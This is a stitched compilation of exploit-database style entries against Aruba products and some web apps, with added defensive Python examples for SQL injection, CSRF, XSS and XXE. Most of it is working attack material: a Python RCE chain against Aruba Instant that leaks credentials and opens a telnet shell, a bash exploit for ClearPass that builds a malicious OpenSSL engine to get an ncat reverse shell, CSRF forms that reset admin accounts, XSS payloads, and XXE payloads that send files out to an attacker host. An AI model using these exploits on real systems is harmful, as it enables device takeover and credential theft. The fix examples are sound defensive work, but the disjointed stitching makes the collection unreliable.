User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 14:01:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=u4nfc9bijgcbd8na09o8jp4gb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6538
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/admin/login.php
# 
#....
#32 if ($_POST['btnSubmit']=='btnSubmit')
#33 {
#34 	$sql = "SELECT * FROM auth_user_admin WHERE username='".$_POST['username']."' AND password='".md5($_POST['password'])."'";
#....

# POC: 
# 3)
# http://localhost/[PATH]/shop/product.php?product_id=[SQL]
# 
#....
#35 $product_id = $_GET['product_id'];
#....
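The `login.php` query quoted above (line 34, POC 2) next to its parameterised form, as an added Python example that is not the shopping cart's code. It rebuilds the same string concatenation over an in-memory SQLite table and runs the URL-encoded username/password value from the login POST in the file-upload PoC against both versions. The table and column names are the advisory's; the single admin row is constructed, and `md5()` is kept only to mirror the application.

```python
import hashlib
import sqlite3
from urllib.parse import unquote

# Added example, not the shopping cart's code: the login.php query pattern
# (string concatenation) beside the placeholder version, over a constructed row.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE auth_user_admin (username TEXT, password TEXT)")
    # the app stores md5(password); mirrored so the two queries compare like-for-like
    db.execute("INSERT INTO auth_user_admin VALUES (?, ?)",
               ("admin", hashlib.md5(b"S3cret-not-real").hexdigest()))
    return db


def login_vulnerable(db, username, password):
    # the concatenation from login.php line 34: user input becomes SQL syntax
    sql = ("SELECT * FROM auth_user_admin WHERE username='" + username +
           "' AND password='" + hashlib.md5(password.encode()).hexdigest() + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, username, password):
    # placeholders: values travel separately from the statement, so quotes
    # in the input cannot change its structure
    sql = "SELECT * FROM auth_user_admin WHERE username=? AND password=?"
    params = (username, hashlib.md5(password.encode()).hexdigest())
    return db.execute(sql, params).fetchone()


# the value sent as both username and password in the login POST above, decoded
INJECTED = unquote("%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27")   # 'or 1=1 or ''='


def demo():
    """True where a login succeeds: the injected value only works against
    the concatenated query; real credentials still work against the fixed one."""
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, INJECTED, INJECTED) is not None,
        "fixed": login_fixed(db, INJECTED, INJECTED) is not None,
        "fixed_real_creds": login_fixed(db, "admin", "S3cret-not-real") is not None,
    }


if __name__ == "__main__":
    print(demo())   # {'vulnerable': True, 'fixed': False, 'fixed_real_creds': True}
```

With the injected value the concatenated statement becomes `WHERE username=''or 1=1 or ''='' AND password='...'`, and since `AND` binds tighter than `OR` the `1=1` term makes the whole predicate true for every row. The same treatment applies to `page_id` and `product_id` in POC 1 and 3: bind them as parameters (and cast to an integer first, since both are numeric ids).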
            
# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS

<!--
The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). 
-->

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
            
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8

 

Summary
================

Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Aruba Controller suffers from CSRF and XSS vulnerabilities.



Proof of Concept - CSRF
=========================

192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server 

<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.
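The server-side checks that would make this PoC, the Asbru #3 form and the Arunna form above all fail, as an added Python example (not code from Aruba, Asbru or Arunna): a per-session token the cross-site page cannot read, an `Origin`/`Referer` check, and refusing state changes on GET (this PoC is an `<img>` GET). The function names, the session ids and the server key are assumptions.

```python
import hashlib
import hmac
import secrets

# Added example, not vendor code: the three CSRF checks a state-changing
# endpoint needs. SECRET_KEY is generated at startup; all names are assumed.

SECRET_KEY = secrets.token_bytes(32)
STATE_CHANGING = ("POST", "PUT", "PATCH", "DELETE")


def issue_csrf_token(session_id: str) -> str:
    """Token = HMAC(key, session id): bound to one session and not derivable
    by a page on another origin, which is what a cross-site form lacks."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(origin: str, own_origin: str) -> bool:
    # exact match or own_origin followed by a path; a plain startswith would
    # accept 'https://192.168.0.1:4343.evil.example'
    return origin == own_origin or origin.startswith(own_origin + "/")


def csrf_check(method: str, headers: dict, form: dict, session_id: str, own_origin: str):
    """Return (allowed, reason) for a request that changes state."""
    method = method.upper()
    if method not in STATE_CHANGING:
        # an <img src=...> or a link is a GET; state changes must never ride on it
        return False, "state change attempted over " + method
    # browsers attach Origin to cross-site POSTs; if either header is present it must be ours
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin and not same_origin(origin, own_origin):
        return False, "cross-site origin " + origin
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, "missing or wrong csrf token"
    return True, "ok"


if __name__ == "__main__":
    own = "https://192.168.0.1:4343"
    # this advisory's PoC: an <img> GET to the backup endpoint
    print(csrf_check("GET", {"Referer": "http://attacker.example/"}, {}, "sid-1", own))
    # the Asbru/Arunna style auto-submitted POST from another origin, no token
    print(csrf_check("POST", {"Origin": "http://attacker.example"},
                     {"userclass": "administrator"}, "sid-1", own))
    # a legitimate same-origin POST carrying the session's token
    print(csrf_check("POST", {"Origin": own},
                     {"csrf_token": issue_csrf_token("sid-1")}, "sid-1", own))
```

The token check is the one that holds even when a browser omits `Origin` and `Referer`; the origin check catches the forms above early, and the method rule removes the `<img>` vector entirely. Marking the session cookie `SameSite=Lax` or `Strict` adds a browser-side layer on top of these.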



Proof of Concept - XSS
=========================

https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
            
# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification
# Date: 15/07/2021
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://www.arubanetworks.com/
# Version:
# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
# Aruba Instant 6.5.x: 6.5.4.18 and below
# Aruba Instant 8.3.x: 8.3.0.14 and below
# Aruba Instant 8.5.x: 8.5.0.11 and below
# Aruba Instant 8.6.x: 8.6.0.6 and below
# Aruba Instant 8.7.x: 8.7.1.0 and below
# Tested on: Aruba Instant
# CVE : CVE-2021-25155

import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests

urllib3.disable_warnings()

CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245


def race_papi_message(ip):

    global CONTINUE_RACE

    payload = b"\x49\x72"
    payload += b"\x00\x03"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x00\x00"
    payload += b"\x00\x00"
    payload += b"\x3B\x7E"
    payload += b"\x41\x41"
    payload += b"\x04\x22"
    payload += b"\x00\x00"
    payload += b"\x02\x00"
    payload += b"\x00\x00"
    payload += b"\x00" * 12 * 4
    text_to_send = bytes()
    for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
        text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)

    packet = payload + text_to_send

    while CONTINUE_RACE:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((ip, 8211))
        s.send(packet)
        s.close()
        time.sleep(0.004)


def find_credentials(text):
    res = re.search("mgmt-user .*", text)[0]
    res = res.split(" ")
    return (res[1], res[2])


def login(ip, username, password):
    login_data = {
            "opcode": "login",
            "user": username,
            "passwd": password,
            "refresh": "false",
    }
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)

    root = ET.fromstring(res.text)
    return root.find("./data[@name='sid']").text


def create_directory(ip, sid):
    request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
    res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
    if "/tmp/oper_" in res.text:
        print("[+] Successfully created /tmp/oper_/ directory :)")
        return True
    else:
        print("[-] Failed creating /tmp/oper_/ directory")
        return False


def prepare_upload_id(command):
    base_payload = "/../../etc/httpd/"
    cmd_len = len(command)
    padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8  # for the .gz at the end and the '; + spaces
    if padding_len < 0:
        print("[-] Command too long length:{}".format(padding_len))
        exit(1)
    return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)    


def create_file(ip, command):
    upload_id = prepare_upload_id(command)
    requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)


def run_command(ip, command):
    print("[*] Executing telnet")
    command = command.replace("?", "%3F")
    command = command.replace("#", "\\\\x23")
    s = requests.Session()
    req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
    prep = req.prepare()
    response = s.send(prep, verify=False)
    return response.text

def build_command(command):
    command = command.replace("/", "\\\\x2F")
    command = command.replace("#", "\\\\x23")
    command = command.replace("\"", "\\\"")
    command = command.replace("`", "\`")
    final_command = "echo -e \"{}\"|sh".format(command)
    return final_command

def telnet_connect(router_ip):
    print("[*] Connecting to telnet")
    with telnetlib.Telnet(router_ip, 22222) as tn:
        tn.write(b"rm /etc/httpd/A*sh*.gz\n")
        tn.interact()


def main():

    global CONTINUE_RACE

    ip = sys.argv[1]

    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
    papi_thread.start()

    while CONTINUE_RACE:
        time.sleep(0.1)
        res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
        if "version" in res.text:
            print("[+] Successfully leaked the password from config")
            CONTINUE_RACE = False

    file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
    user, password = find_credentials(file_content)

    print("[+] Successfully extracted username: {} and password: {}".format(user, password))
    sid = login(ip, user, password)
    print("[*] SID generated: {}".format(sid))

    command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
    final_command = build_command(command)

    if not create_directory(ip, sid):
        return

    print("[*] Creating malicious file in /etc/httpd/")
    create_file(ip, final_command)
    print(run_command(ip, final_command))
    time.sleep(1) # Sleeping waiting for telnet.
    telnet_connect(ip)


if __name__ == "__main__":
    main()
            
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115

Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.

#!/usr/bin/env bash

if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi
cat <<EOF >>payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF

gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
cat <<"EOF"

/(\

¡ !´\

| )\ `.

| `.) \,-,--

( / /

`'-.,;_/

`----

EOF

printf "\nPleasea waita for your spicy shell...\n\n"

ncat -v -l $3 $4
            
===============================================================================
                  title: ClearPass Policy Manager Stored XSS
                case id: CM-2014-01
                product: Aruba ClearPass Policy Manager
     vulnerability type: Stored cross-site script
               severity: Medium
                  found: 2014-11-24
                     by: Cristiano Maruti (@cmaruti)
===============================================================================

[EXECUTIVE SUMMARY]

 The analysis discovered a stored cross-site scripting vulnerability (OWASP
 OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated
 user is able to inject arbitrary script through the login form, which may be
 rendered and triggered later when a privileged authenticated user reviews the
 access audit record. An attacker can use the aforementioned vulnerability to
 effectively steal the session cookies of privileged logged-on users.

[VULNERABLE VERSIONS]

The following version of the Aruba ClearPass Policy Manager was affected by the
vulnerability; previous versions may be vulnerable as well:
- Aruba ClearPass Policy Manager 6.4

[TECHNICAL DETAILS]

It is possible to reproduce the vulnerability by following these steps:
1. Open the login page with your browser;
2. Put the "><img src=x onerror=alert(1337)><" string in the username field
and fill in the password field with a value of your choice;
3. Submit the form;
4. Log in to the application with an administrative user;
5. Go to "Monitoring -> Live monitoring -> Access tracker" to trigger the payload.

Below is a full transcript of the HTTP request used to trigger the vulnerability:
HTTP Request
-------------------------------------------------------------------------------
POST /tips/tipsLoginSubmit.action HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.1/tips/tipsLoginSubmit.action
Cookie: <A VALID UNAUTH COOKIE>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

username="><img src=x onerror=alert("0wn3d")><"&password=test
-------------------------------------------------------------------------------
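The root cause is that the attempted username is written into the Access Tracker page verbatim, so a login failure becomes a stored payload that executes in the administrator's browser. The following is an added example (not ClearPass code) of the defect beside its fix: an audit row rendered with and without entity encoding, plus a small parser that counts the elements the browser would actually see, which shows that the encoded row contains the same three elements regardless of input. The row template is an assumption for the example; the payload string is the one from the steps above. The same output-encoding rule applies to the reflected XSS entries elsewhere on this page (the Aruba Mobility Controller `switch_mon.html` case and the AirWave `group_list.xml` error message).

```python
import html
from html.parser import HTMLParser

# Hypothetical audit-row template; the real page layout is not known here.
AUDIT_ROW_TEMPLATE = '<tr><td class="user">{user}</td><td>{outcome}</td></tr>'


def render_audit_row_unsafe(username, outcome):
    """The defect class: untrusted input placed into HTML without encoding."""
    return AUDIT_ROW_TEMPLATE.format(user=username, outcome=outcome)


def render_audit_row(username, outcome):
    """The fix: entity-encode every untrusted value for the HTML text context.

    quote=True also encodes ' and ", so the same helper is safe for values
    that land inside a quoted attribute.
    """
    return AUDIT_ROW_TEMPLATE.format(
        user=html.escape(username, quote=True),
        outcome=html.escape(outcome, quote=True),
    )


class _ElementCollector(HTMLParser):
    """Records the start tags a browser would create from a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_names(fragment):
    """Return the element names present in an HTML fragment, in document order."""
    collector = _ElementCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


# The username submitted in the PoC above (a login attempt, so it is logged).
PAYLOAD = '"><img src=x onerror=alert(1337)><"'

if __name__ == "__main__":
    for label, render in (("unsafe", render_audit_row_unsafe), ("encoded", render_audit_row)):
        row = render(PAYLOAD, "failed")
        print(f"{label:8s} elements={element_names(row)}")
        print(f"         {row}")
```

A useful regression test for any audit or log viewer is exactly the `element_names` comparison: feed a value containing markup through the renderer and assert the element list equals the template's own elements.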

A copy of the report with technical details about the vulnerability I have
identified is available at:
https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf


[VULNERABILITY REFERENCE]

The following CVE ID was allocated to track the vulnerability:
- CVE-2015-1389: Stored cross-site scripting (XSS)

[DISCLOSURE TIMELINE]

2014-11-24 Vulnerability submitted to vendor through the Bugcrowd
bounty program.
2014-12-09 Vendor acknowledged the problem.
2014-12-10 Researcher requested to publicly disclose the issue.
2015-02-16 Vendor released a fix for the reported issue.
2015-02-09 Vendor asked to hold-on for the public disclosure.
2015-02-22 Vendor postponed the public disclosure date
2015-02-22 Public coordinated disclosure.



[SOLUTION]

Aruba released an update to fix the vulnerability (ClearPass 6.5 or
later). Please see the link below for further information released by the
vendor:
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt


[REPORT URL]

https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
            
SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
=======================================================================
              title: XML External Entity Injection (XXE),
                     Reflected Cross Site Scripting
            product: Aruba AirWave
 vulnerable version: <=8.2.3
      fixed version: 8.2.3.1
         CVE number: CVE-2016-8526, CVE-2016-8527
             impact: high
           homepage: http://www.arubanetworks.com/
              found: 2016-11-21
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
is a networking vendor selling enterprise wireless LAN and edge access
networking equipment. The company has over 1,800 employees and is
headquartered in Sunnyvale, California. Aruba's core products are access points
(APs), mobility controllers, and network management software through their
Airwave Management Platform product."

Source: https://en.wikipedia.org/wiki/Aruba_Networks


Business recommendation:
------------------------
SEC Consult recommends not to use the product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (CVE-2016-8526)
The XML parser in use resolves external XML entities, which allows attackers
to read files and to send requests to systems on the internal network (e.g.
port scanning).

The vulnerability can be exploited by a low-privileged read-only user
to read sensitive information / files with malicious XML code.
Note that as Aruba's passwords are encrypted with a shared static key,
privilege escalation to the admin role is also possible!

Multiple different functions are affected by XXE.

According to the vendor, another researcher also found one of the XXE issues,
so credit goes to them as well.
Vendor: "Although the team hasn't reproduced this yet, I’ve had other reports
come in through our bug bounty program last month about XXE issues in VisualRF.
One of the issues you reported is the same, and you reported three others that we
haven't seen yet."


2) Reflected Cross Site Scripting (CVE-2016-8527)
Due to the lack of input validation, an attacker can insert malicious JavaScript
code that is executed in a victim's browser context.


Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2016-8526)
a) XXE in VisualRF Backup Sites

Login as any user role (including read-only/standard user) 
Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' > 
Select action 'Export Floor Plans' > Ok

POST /visualrf/backup_sites HTTP/1.1
Host: <AirWaveHost>
[...]

xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY %25 foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1">%26%65%78%66%69%6c%3b</visualrf:sites>

$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///<removed>">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">

$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_102@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD [General]
[...]
< ; set global WLC credentials
> 230 more data please!
< wlc_user: <username>
> 230 more data please!
< wlc_pasw: <password>
[...]

b) XXE in Visual RF Site Restore 
$ cat version.xml
   <?xml version="1.0" encoding="UTF-8" standalone="no"?>
   <!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/version.dtd">%foo;%param1;]>
   &exfil;<backup backup-time="Mon Nov 21 14:44:41 CET 2016" build="${svn.build}" plan-mode="false" version="8.0.0"/>

$ zip backup_sectest.zip version.xml
  adding: version.xml (deflated 16%)

And then just upload the backup_sectest.zip via the restore functionality.

POST /nf/visualrf_siterestore HTTP/1.1
Host: <AirWaveHost>
[...]

------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
Content-Type: application/zip

[.. backup_sectest.zip ..]
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="import"

Import
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--


c) XXE in Visual RF Verify
POST /visualrf/verify/<Site-ID> HTTP/1.1
Host: <AirWaveHost>
[...]

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%foo;%param1;]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1"><site 
[...]
/>&exfil;</site></visualrf:sites>
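All three PoCs above work because the parser accepts a DOCTYPE and fetches the external DTD and entity it declares. The fix on the parsing side is the same in every language: refuse DOCTYPE and entity declarations outright, since none of the documents these endpoints legitimately receive need them. The following is an added example (not AirWave code; AirWave's parser is Java, per the `Java1.8.0_102` FTP banner in the transcript) of such a hardened parser built on Python's expat bindings, run over a constructed benign `visualrf:sites` document and over two constructed documents modelled on the PoC, one with an inline external entity and one with an external DTD. The placeholder URLs in the malicious samples are deliberately unresolvable.

```python
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document contains DTD constructs we never want to process."""


def parse_xml_strict(data):
    """Parse XML, refusing any DOCTYPE or entity declaration.

    Returns {"elements": [tag names in document order], "text": concatenated
    character data}. The handlers raise before expat can act on a DTD, so no
    external resource is ever fetched and no entity is ever expanded.
    """
    if isinstance(data, str):
        data = data.encode("utf-8")

    parser = xml.parsers.expat.ParserCreate()
    # Belt and braces: even if a DOCTYPE slipped through, never load parameter
    # entities (the %foo; / %param1; mechanism used by the PoC).
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    result = {"elements": [], "text": ""}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError(
            f"DOCTYPE declaration not allowed (name={name!r}, system_id={system_id!r})"
        )

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXMLError(f"entity declaration not allowed (name={name!r})")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXMLError(f"external entity reference not allowed ({system_id!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: result["elements"].append(name)
    parser.CharacterDataHandler = lambda text: result.__setitem__("text", result["text"] + text)

    parser.Parse(data, True)  # exceptions raised in handlers propagate from here
    return result


def classify(data):
    """Return 'accepted' or 'rejected: <reason>' for a document."""
    try:
        parse_xml_strict(data)
        return "accepted"
    except UnsafeXMLError as exc:
        return f"rejected: {exc}"


# Constructed benign payload of the kind the backup_sites endpoint expects.
SAFE_DOC = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<visualrf:sites xmlns:visualrf="http://www.airwave.com/" version="1">'
    '<site name="demo"/></visualrf:sites>'
)

# Constructed samples modelled on the PoC; the URLs are placeholders.
EXTERNAL_ENTITY_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER">]>'
    '<visualrf:sites xmlns:visualrf="http://www.airwave.com/">&xxe;</visualrf:sites>'
)
EXTERNAL_DTD_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE x SYSTEM "http://attacker.example:1234/sectest.dtd">'
    '<visualrf:sites xmlns:visualrf="http://www.airwave.com/"/>'
)

if __name__ == "__main__":
    for label, doc in (("safe", SAFE_DOC), ("entity", EXTERNAL_ENTITY_DOC), ("dtd", EXTERNAL_DTD_DOC)):
        print(f"{label:7s} {classify(doc)}")
```

The equivalent in the Java world is disabling DOCTYPE on the `DocumentBuilderFactory` or `SAXParserFactory` (`http://apache.org/xml/features/disallow-doctype-decl`) and turning off external general and parameter entities; the principle, reject the construct rather than try to sanitise it, is the same.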


2) Reflected Cross Site Scripting (CVE-2016-8527)
Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.

GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
Host: <AirWaveHost>

[...]
HTTP/1.1 200 OK
[...]

<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<results>
  <error>For input string: "<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a>"</error>
</results>



Vulnerable / tested versions:
-----------------------------
The following versions are affected by the identified vulnerabilities, which
were the most recent versions at the time of discovery:
Aruba AirWave version <8.2.3.1


Vendor contact timeline:
------------------------
2016-11-23: Contacting vendor through aruba-sirt@hpe.com
2016-11-23: Vendor: Established communication over encrypted channel and asked
            for extending the disclosure date due to the upcoming holidays
2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
            the reflected XSS issue.
2017-02-21: Aruba AirWave 8.2.3.1 was released.
2017-03-01: Coordinated disclosure of the security advisory. 


Solution:
---------
Update to version 8.2.3.1 or later.

http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
